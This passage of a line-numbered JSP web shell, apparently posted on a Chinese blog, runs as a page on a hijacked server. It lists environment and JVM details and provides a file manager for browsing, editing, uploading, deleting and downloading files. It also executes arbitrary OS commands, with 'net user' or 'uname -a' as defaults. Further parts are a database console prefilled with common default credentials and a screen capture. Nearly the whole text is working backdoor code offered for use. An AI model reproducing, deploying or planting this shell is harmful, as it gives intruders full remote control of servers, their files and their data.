988 <td><%=System.getenv().get("USERDNSDOMAIN")%></td>
989 </tr>
990 <tr>
991 <td><%=orChinese("User Profile") %></td>
992 <td><%=System.getenv().get("USERPROFILE")%></td>
993 </tr>
994 <tr>
995 <td><%=orChinese("All User Profile") %></td>
996 <td><%=System.getenv().get("ALLUSERSPROFILE")%></td>
997 </tr>
998 <tr>
999 <td><%=orChinese("Temp") %></td>
1000 <td><%=System.getenv().get("TEMP")%></td>
1001 </tr>
1002 <tr>
1003 <td><%=orChinese("Program Files") %></td>
1004 <td><%=System.getenv().get("ProgramFiles")%></td>
1005 </tr>
1006 <tr>
1007 <td><%=orChinese("AppData") %></td>
1008 <td><%=System.getenv().get("APPDATA")%></td>
1009 </tr>
1010 <tr>
1011 <td><%=orChinese("System Root") %></td>
1012 <td><%=System.getenv().get("SystemRoot")%></td>
1013 </tr>
1014 <tr>
1015 <td><%=orChinese("Console") %></td>
1016 <td><%=System.getenv().get("ComSpec")%></td>
1017 </tr>
1018 <tr>
1019 <td><%=orChinese("File Executable") %></td>
1020 <td><%=System.getenv().get("PATHEXT")%></td>
1021 </tr>
1022 <tr>
1023 <td><%=orChinese("My Path") %></td>
1024 <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td>
1025 </tr>
1026 <tr>
1027 <td><%=orChinese("User Dir") %></td>
1028 <td><%=System.getProperty("user.dir")%></td>
1029 </tr>
1030 <tr>
1031 <td><%=orChinese("Protocol") %></td>
1032 <td><%=request.getProtocol()%></td>
1033 </tr>
1034 <tr>
1035 <td><%=orChinese("Server Info") %></td>
1036 <td><%=application.getServerInfo()%></td>
1037 </tr>
1038 <tr>
1039 <td><%=orChinese("JDK Version") %></td>
1040 <td><%=System.getProperty("java.version")%></td>
1041 </tr>
1042 <tr>
1043 <td><%=orChinese("JDK Home") %></td>
1044 <td><%=System.getProperty("java.home")%></td>
1045 </tr>
1046 <tr>
1047 <td><%=orChinese("JVM Version") %></td>
1048 <td><%=System.getProperty("java.vm.specification.version")%></td>
1049 </tr>
1050 <tr>
1051 <td><%=orChinese("JVM Name") %></td>
1052 <td><%=System.getProperty("java.vm.name")%></td>
1053 </tr>
1054 <tr>
1055 <td><%=orChinese("Class Path") %></td>
1056 <td><%=System.getProperty("java.class.path")%></td>
1057 </tr>
1058 <tr>
1059 <td><%=orChinese("Java Library Path") %></td>
1060 <td><%=System.getProperty("java.library.path")%></td>
1061 </tr>
1062 <tr>
1063 <td><%=orChinese("Java tmpdir") %></td>
1064 <td><%=System.getProperty("java.io.tmpdir")%></td>
1065 </tr>
1066 <tr>
1067 <td><%=orChinese("Compiler") %></td>
1068 <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
1069 </tr>
1070 <tr>
1071 <td><%=orChinese("Java ext dirs") %></td>
1072 <td><%=System.getProperty("java.ext.dirs")%></td>
1073 </tr>
1074 <tr>
1075 <td><%=orChinese("Remote Addr") %></td>
1076 <td><%=request.getRemoteAddr()%></td>
1077 </tr>
1078 <tr>
1079 <td><%=orChinese("Remote Host") %></td>
1080 <td><%=request.getRemoteHost()%></td>
1081 </tr>
1082 <tr>
1083 <td><%=orChinese("Remote User") %></td>
1084 <td><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
1085 </tr>
1086 <tr>
1087 <td><%=orChinese("Scheme") %></td>
1088 <td><%=request.getScheme()%></td>
1089 </tr>
1090 <tr>
1091 <td><%=orChinese("Secure") %></td>
1092 <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td>
1093 </tr>
1094 </table>
1095 <%
1096 }
1097 if (action.equals("file")) {
1098 String curPath = "";
1099 String result = "";
1100 String fsAction = "";
1101 if (request.getParameter("curPath") == null) {
1102 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1103 curPath = pathConvert((new File(curPath)).getParent());
1104 }
1105 else {
1106 curPath = Unicode2GB((String)request.getParameter("curPath"));
1107 curPath = pathConvert(curPath);
1108 }
1109 if (request.getParameter("fsAction") == null) {
1110 fsAction = "list";
1111 } else {
1112 fsAction = (String)request.getParameter("fsAction");
1113 }
1114 if (fsAction.equals("list")){
1115 %>
1116 <div class="container">
1117 <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>">
1118 <div align="left">
1119
1120 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>"
1121 class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans"
1122 onclick="javascript:document.getElementById(‘file_system‘).click();" />
1123 <%
1124 String os = System.getProperties().getProperty("os.name");
1125 if (os.toUpperCase().contains("WIN")){
1126 File[] files = File.listRoots();
1127 for(int i = 0; i < files.length; i++) {
1128 %>
1129 <input type="button" class="trans"
1130 onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\", "/")%>‘"
1131 value="<%= files[i]%>" />
1132 <%
1133 }
1134 }
1135 %>
1136
1137 </div>
1138 <table class="onhover" style="width: 100%">
1139 <tr>
1140 <td align="center"><%=orChinese("File Name") %></td>
1141 <td align="center" width="10%"><%=orChinese("Size") %></td>
1142 <td align="center" width="38%"><%=orChinese("Operation") %></td>
1143 </tr>
1144 <tr>
1145 <%
1146 File curFolder = new File(curPath);
1147 %>
1148 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td>
1149 <td align="right"></td>
1150 <td></td>
1151 </tr>
1152 <%
1153 for (File file : this.getFolderList(curPath)){
1154 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1155 f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download);
1156 %>
1157 <tr>
1158 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>]
1159 </a></td>
1160 <td align="right"><%=f.getLength() %></td>
1161 <td><%=f.getHtmlOperation() %></td>
1162 </tr>
1163 <%
1164 }
1165 for (File file : this.getFileList(curPath)){
1166 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1167 f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download);
1168 %>
1169 <tr>
1170 <td><%=f.getName() %></td>
1171 <td align="right"><%=f.getLength() %></td>
1172 <td><%=f.getHtmlOperation() %></td>
1173 </tr>
1174 <%
1175 }
1176 %>
1177 </table>
1178 <div align="left">
1179 <table style="width: 100%;">
1180 <tr>
1181 <td align="left" style="border: 0">
1182 <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" />
1183 <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()">
1184 <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" />
1185 </td>
1186 <td align="right" style="border: 0">
1187 <input type="text" id="createFileName" class="trans" size="26" name="fileName" />
1188 <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘>
1189 <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘>
1190 </td>
1191 </tr>
1192 </table>
1193 </div>
1194 </form>
1195 <div align="left">
1196 <form id="uploadform" name="upload" enctype="multipart/form-data" method="post"
1197 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>">
1198 <input type="file" style="display: none" name="upFile" id="fileSelect"
1199 onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" />
1200 </form>
1201 </div>
1202 </div>
1203
1204 <%
1205 }else if (fsAction.equals("Edit")){
1206 if (request.getParameter("fileName") == null) {
1207 result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1208 } else {
1209 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1210 result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action);
1211 }
1212 }else if (fsAction.equals("save")) {
1213 if (request.getParameter("fileContent") == null) {
1214 result = "<font color=\"red\">"+orChinese("Content is null")+"</font>";
1215 } else {
1216 if (request.getParameter("fileName") == null) {
1217 result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1218 } else {
1219 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1220 String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
1221 result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent);
1222 }
1223 }
1224 } else if (fsAction.equals("createFolder")) {
1225 if (request.getParameter("fileName") == null) {
1226 result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1227 } else {
1228 String folderName = Unicode2GB(request.getParameter("fileName").trim());
1229 if (folderName.equals("")) {
1230 result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1231 } else {
1232 result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action);
1233 }
1234 }
1235 } else if (fsAction.equals("createFile")) {
1236 if (request.getParameter("fileName") == null) {
1237 result = "<div class=\"container\"><font color=\"red\">"+orChinese("File name is null")+"</font></div>";
1238 } else {
1239 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1240 if (fileName.equals("")) {
1241 result = "<div class=\"container\"><font color=\"red\">"+orChinese("File name is null")+"</font></div>";
1242 } else {
1243 result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1244 }
1245 }
1246 } else if (fsAction.equals("Delete")) {
1247 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1248 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1249 } else if (fsAction.equals("upload")) {
1250 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
1251 } else if (fsAction.equals("Rename")) {
1252 String newName = Unicode2GB(request.getParameter("newName").trim());
1253 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1254 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action);
1255 } else if (fsAction.equals("Download")) {
1256 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1257 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response);
1258 }
1259 %>
1260 <div class="container">
1261 <font color="red"><%=result %></font>
1262 </div>
1263 <%
1264 }
1265 if (action.equals("search")) {
1266 String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1267 curPath = pathConvert((new File(curPath)).getParent());
1268
1269 String searchpath = Unicode2GB(request.getParameter("searchpath"));
1270 if (searchpath == null || searchpath.trim().length() == 0){
1271 searchpath = curPath;
1272 }
1273 String searchsubfix = Unicode2GB(request.getParameter("searchsubfix"));
1274 if (searchsubfix == null || searchsubfix.trim().length() == 0){
1275 searchsubfix = ".jsp .html .htm";
1276 }
1277 String searchby = request.getParameter("searchby");
1278 String ignorecase = request.getParameter("ignorecase");
1279 String searchcontent = Unicode2GB(request.getParameter("searchcontent"));
1280 if (searchcontent == null || searchcontent.trim().length() == 0){
1281 searchcontent = "index";
1282 }
1283 String fsAction = request.getParameter("fsAction");
1284 String searchResult = "";
1285 if (fsAction != null){
1286 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase));
1287 }
1288 %>
1289 <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>">
1290 <table>
1291 <tr>
1292 <td width="260px" align="right"><%=orChinese("Search from") %>:</td>
1293 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td>
1294 </tr>
1295 <tr>
1296 <td align="right"><%=orChinese("Search for file type") %>:</td>
1297 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td>
1298 </tr>
1299 <tr>
1300 <td align="right"><%=orChinese("Setting") %>:</td>
1301 <td>
1302 <%
1303 if ("content".equals(searchby)){
1304 %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by Name") %> <input type="radio" name="searchby"
1305 class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <%
1306 }else{
1307 %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio"
1308 name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <%
1309 }
1310 if ("yes".equals(ignorecase)){
1311 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <%
1312 }else{
1313 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <%
1314 }
1315 %>
1316 </td>
1317 </tr>
1318 <tr>
1319 <td align="right"><%=orChinese("Search keyword") %>:</td>
1320 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit"
1321 value="<%=orChinese("Search") %>" class="trans" /></td>
1322 </tr>
1323 <tr>
1324 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td>
1325 </tr>
1326 </table>
1327 </form>
1328 <%
1329 }
1330 if (action.equals("command")) {
1331 String cmd = "";
1332 InputStream ins = null;
1333 String result = "";
1334
1335 if (request.getParameter("command") != null) {
1336 cmd = (String)request.getParameter("command");
1337 result = exeCmd(cmd);
1338 }
1339 %>
1340 <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>">
1341 <%
1342 if (cmd==null || "".equals(cmd.trim())){
1343 if (System.getProperty("os.name").toLowerCase().contains("windows")){
1344 cmd = "cmd.exe /c net user";
1345 }else{
1346 cmd = "uname -a";
1347 }
1348 }
1349 %>
1350 <div align="left">
1351 <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans"
1352 value="<%=orChinese("Execute") %>" />
1353 </div>
1354 <table style="width: 100%; height: 100px">
1355 <tr>
1356 <td><%=result == "" ? " " : result%></td>
1357 </tr>
1358 </table>
1359 </form>
1360 <%
1361 }
1362 if (action.equals("database")) {
1363 String SQLResult = "";
1364 String dbType = request.getParameter("dbType");
1365 dbType = dbType == null?"Mysql":dbType;
1366 String driver = request.getParameter("driver");
1367 String port = request.getParameter("port");
1368 String dbname = Unicode2GB(request.getParameter("dbname"));
1369 String host = Unicode2GB(request.getParameter("host"));
1370 String sql = Unicode2GB(request.getParameter("sql"));
1371 String dbuser = Unicode2GB(request.getParameter("dbuser"));
1372 String dbpass = Unicode2GB(request.getParameter("dbpass"));
1373 String fsAction = request.getParameter("fsAction");
1374 String connurl = Unicode2GB(request.getParameter("connurl"));
1375 if (sql==null) sql="";
1376 if (fsAction == null || "typeChange".equals(fsAction)){
1377 if ("Mysql".equalsIgnoreCase(dbType)){
1378 driver = "com.mysql.jdbc.Driver";
1379 port = "3306";
1380 dbuser = "root";
1381 dbpass = "root";
1382 host = "localhost";
1383 dbname = "mysql";
1384 }else if("Oracle".equalsIgnoreCase(dbType)){
1385 driver = "oracle.jdbc.driver.OracleDriver";
1386 port = "1521";
1387 dbuser = "scott";
1388 dbpass = "tiger";
1389 host = "localhost";
1390 dbname = "orcl";
1391 }else if("SQLServer".equalsIgnoreCase(dbType)){
1392 driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
1393 port = "1433";
1394 dbuser = "sa";
1395 dbpass = "123456";
1396 host = "localhost";
1397 dbname = "master";
1398 }else if("DB2".equalsIgnoreCase(dbType)){
1399 driver = "com.ibm.db2.jdbc.app.DB2Driver";
1400 port = "5000";
1401 dbuser = "db2admin";
1402 dbpass = "123456";
1403 host = "localhost";
1404 dbname = "";
1405 }else if("Other".equalsIgnoreCase(dbType)){
1406 driver = "sun.jdbc.odbc.JdbcOdbcDriver";
1407 connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password";
1408 dbuser = "";
1409 dbpass = "";
1410 }
1411 }else if("connect".equals(fsAction)){
1412 if (driver!=null){
1413 Class.forName(driver);
1414 if ("Mysql".equalsIgnoreCase(dbType)){
1415 connurl = "jdbc:mysql://localhost:"+port+"/" + dbname;
1416 }else if("Oracle".equalsIgnoreCase(dbType)){
1417 connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname;
1418 }else if("SQLServer".equalsIgnoreCase(dbType)){
1419 connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname;
1420 }else if("DB2".equalsIgnoreCase(dbType)){
1421 connurl = "jdbc:db2://localhost:"+port+"/" + dbname;
1422 }
1423 SQLResult = this.DBConnect(connurl, dbuser, dbpass);
1424 }
1425 }else if("disconnect".equals(fsAction)){
1426 try {
1427 if (dbStatement != null) {
1428 dbStatement.close();
1429 dbStatement = null;
1430 }
1431 if (conn != null) {
1432 conn.close();
1433 conn = null;
1434 }
1435 } catch (SQLException e) {
1436
1437 }
1438 }else if("execute".equals(fsAction)){
1439 SQLResult = DBExecute(sql);
1440 }
1441 %>
1442 <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>">
1443 <table style="width: 100%;">
1444 <tr>
1445 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td>
1446 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white"
1447 onchange="dbsubmit(‘typeChange‘)">
1448 <%
1449 if ("Mysql".equalsIgnoreCase(dbType)){
1450 %>
1451 <option value="Mysql" selected="selected">Mysql</option>
1452 <option value="Oracle">Oracle</option>
1453 <option value="SQLServer">SQLServer</option>
1454 <option value="DB2">DB2</option>
1455 <option value="Other">Other</option>
1456 <%
1457 }else if("Oracle".equalsIgnoreCase(dbType)){
1458 %>
1459 <option value="Mysql">Mysql</option>
1460 <option value="Oracle" selected="selected">Oracle</option>
1461 <option value="SQLServer">SQLServer</option>
1462 <option value="DB2">DB2</option>
1463 <option value="Other">Other</option>
1464 <%
1465 }else if("DB2".equalsIgnoreCase(dbType)){
1466 %>
1467 <option value="Mysql">Mysql</option>
1468 <option value="Oracle">Oracle</option>
1469 <option value="SQLServer">SQLServer</option>
1470 <option value="DB2" selected="selected">DB2</option>
1471 <option value="Other">Other</option>
1472 <%
1473 }else if("SQLServer".equalsIgnoreCase(dbType)){
1474 %>
1475 <option value="Mysql">Mysql</option>
1476 <option value="Oracle">Oracle</option>
1477 <option value="SQLServer" selected="selected">SQLServer</option>
1478 <option value="DB2">DB2</option>
1479 <option value="Other">Other</option>
1480 <%
1481 }else if("Other".equalsIgnoreCase(dbType)){
1482 %>
1483 <option value="Mysql">Mysql</option>
1484 <option value="Oracle">Oracle</option>
1485 <option value="SQLServer">SQLServer</option>
1486 <option value="DB2">DB2</option>
1487 <option value="Other" selected="selected">Other</option>
1488 <%
1489 }
1490 %>
1491 </select></td>
1492 </tr>
1493
1494 <tr>
1495 <td align="right"><%=orChinese("Driver") %>:</td>
1496 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td>
1497 </tr>
1498 <%
1499 if ("Other".equalsIgnoreCase(dbType)){
1500 %>
1501 <tr>
1502 <td align="right"><%=orChinese("Connect URL") %>:</td>
1503 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td>
1504 </tr>
1505 <%
1506 }else{
1507 %>
1508 <tr>
1509 <td align="right"><%=orChinese("Host") %>:</td>
1510 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td>
1511 </tr>
1512 <tr>
1513 <td align="right"><%=orChinese("Port") %>:</td>
1514 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td>
1515 </tr>
1516 <tr>
1517 <td align="right"><%=orChinese("DB Name") %>:</td>
1518 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td>
1519 </tr>
1520 <%
1521 }
1522 %>
1523 <tr>
1524 <td align="right"><%=orChinese("Username") %>:</td>
1525 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td>
1526 </tr>
1527 <tr>
1528 <td align="right"><%=orChinese("Password") %>:</td>
1529 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td>
1530 </tr>
1531 <tr>
1532 <td align="right"><%=orChinese("Connect") %>:</td>
1533 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button"
1534 class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td>
1535 </tr>
1536 <tr>
1537 <td align="right"><%=orChinese("SQL") %>:</td>
1538 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans"
1539 value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td>
1540 </tr>
1541 <tr height="50">
1542 <td colspan="2"><%=SQLResult %></td>
1543 <tr />
1544 </table>
1545 </form>
1546 <%}
1547 if (action.equals("screen")){
1548 %>
1549 <div class="container" align="left">
1550 <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" />
1551 <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" />
1552 </div>
1553 <%
1554 }
1555 if (action.equals("getscreen")){
1556 out.clear();
1557 out = pageContext.pushBody();
1558 this.getScreenImg(request, response);
1559 }
1560 %>
1561 <%}%>
1562 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a>
1563 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">中文</a>
1564 </body>
1565 </html>
截图:
时间: 2024-10-08 17:51:11